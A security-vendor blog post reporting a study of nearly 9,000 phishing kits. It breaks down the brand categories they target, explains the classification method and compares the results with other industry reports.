Over the last month, PhishLabs analyzed nearly 9,000 phishing kits and variants available on compromised and clandestine servers, file sharing services, underground scammer forums, and various user-generated content sites such as blogs.
The following chart displays a breakdown of phishing kits we analyzed, based on the type of brand targeted. Financial Institutions, ePayment & Money Transfer Services, Social Networking Sites, and Email Services were the brand categories most frequently targeted by phishing kits, representing a combined 77% of kits analyzed.
Chart: Breakdown of Phishing Kit Targets
“Other” includes several brand types that were each targeted in less than 1% of the kit population, such as:
- File sharing sites
- Blogging sites
- Photo services
- Various "paywall" and subscription sites
- Job sites
- Parcel services
A phishing kit is a collection of files typically including web pages, images, scripts, and webserver code that can be installed on a webserver and ready to collect stolen credentials and other sensitive information quickly and with minimal configuration. Phishing kits are sometimes made available for free, but those often include backdoors that allow the kit's author or distributor to receive copies of all stolen data or even take control over the server hosting the kit.
Purpose and methodology
In general, analyzing the kits used to enable phishing attacks provides a different perspective than analyzing phishing emails and phishing sites (which is very useful as well). This additional perspective helps to better understand the phishing landscape, specifically regarding the demand for kits targeting specific organizations and the potential actors involved in attacks.
PhishLabs also analyzes kits to understand how technologies are leveraged, which tactics are used, and what intelligence artifacts can be recovered in order to deploy more efficient and effective countermeasures. For example, there were four phishing kits related to Bitcoin: a community forum kit, a payment services kit, and two kits each imitating a different exchange; however, none utilized invoicing or the new Payment Request feature as part of the ruse.
Some of the kits analyzed were obviously intended for widespread, indiscriminate distribution. Others were more targeted or customized for private use, and some appeared to be hand-crafted for a particular purpose or an exclusive target. In addition to showing up high in search results through malicious SEO (search engine optimization) tactics, links to phishing websites using these kits are delivered via spam email, SMS test messages, instant messenger services, and posts on social media websites and blogs.
Some kits' contents include multiple brands, and the categories are somewhat qualitative, but based generally on the interests of PhishLabs' clients. For example, a kit that includes two online banking brands and another kit that emulates two different service portals operated by the same financial institution were each counted as a single kit under the financial institutions category.
Where categories overlapped, phishing kits were assigned using consistent criteria throughout the analysis. For example, a successful Google or Microsoft phish could be used for any number of different services (email, messaging, social networking, gaming, app stores, blogging, cloud services, etc.). A phishing kit that explicitly targets GMail was classified under Email Services while a generic Google Drive phishing kit was assigned to the Other category.
Similarly, phishing kits targeting Amazon might be classified under eCommerce or Content Provider depending on whether the phishing kit targeted Amazon's online store or their content services (Amazon Instant Video, Amazon MP3, Amazon Appstore, Kindle content, etc.). When category criteria needed to be applied to resolve overlap between categories, it was applied consistently.
How does this compare to other industry breakdowns of phishing targets?
To the best of our knowledge, there has not been a similar breakdown of phishing kit data conducted and published in recent years. Other industry breakdowns of phishing targets have used phishing emails, sites, or URLs to shed light on the organizations targeted.
APWG publishes quarterly Phishing Attack Trends Reports that are based on unique phishing email campaigns and unique phishing sites. The most recent report indicates 78% of attacks target Financial and Payment Service companies. Attacks targeting Social Networking accounted for less than 1%.
Kaspersky Lab published an analysis they performed earlier this year based on clicks on phishing URLs by users of their anti-virus products. Their data showed that phishing URLs for email search sites and social networks were both clicked on by users far more than phishing URLs for financial services. This may indicate that recipients are generally more suspicious of emails with bank branding versus emails with social networking branding.
- Cybercriminals invest significant resources towards creating and distributing phishing kits targeting online accounts for online banking and payment services, many of which are under constant attack.
- Cybercriminals also see significant gain to be had by targeting social networking and email service credentials, which demonstrates the value of those accounts as components of cybercrime schemes.
- While most kits target the above categories, there was broad diversity among the kits analyzed. Cybercriminals are able to attack a very wide range of organizations without needing to create their own phishing content.
To learn more about phishing kits, how they are used, and how to defend against phishing attacks, download the How to Fight Back Against Phishing white paper.